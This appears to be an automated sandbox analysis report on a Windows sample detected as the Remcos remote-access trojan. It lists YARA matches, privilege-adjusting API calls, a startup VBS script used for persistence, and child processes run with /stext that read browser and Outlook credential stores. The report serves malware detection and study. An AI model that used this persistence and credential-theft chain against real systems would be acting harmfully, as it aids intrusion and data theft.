                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@12/14@1/2
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007737B5 GetLastError,FormatMessageW
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007610BF AdjustTokenPrivileges,CloseHandle
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008F10BF AdjustTokenPrivileges,CloseHandle
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_008F10BF AdjustTokenPrivileges,CloseHandle
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_008F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0078A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0077648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | File created: C:\Users\user\AppData\Local\Cocles
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-NKQ1SM
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | File created: C:\Users\user\AppData\Local\Temp\aut930A.tmp
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs"
                  Source: Rgh99876k7e.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | System information queried: HandleInformation
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp, antholite.exe, 00000004.00000002.2144383252.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: antholite.exe, 00000002.00000002.4551692085.0000000006900000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: antholite.exe, 00000003.00000002.2161503913.00000000033F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: Rgh99876k7e.exeReversingLabs: Detection: 63%
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeFile read: C:\Users\user\Desktop\Rgh99876k7e.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Rgh99876k7e.exe "C:\Users\user\Desktop\Rgh99876k7e.exe"
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\Desktop\Rgh99876k7e.exe"
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm"
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea"
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\AppData\Local\Cocles\antholite.exe"
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\Desktop\Rgh99876k7e.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\AppData\Local\Cocles\antholite.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: Rgh99876k7e.exeStatic file information: File size 1521152 > 1048576
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
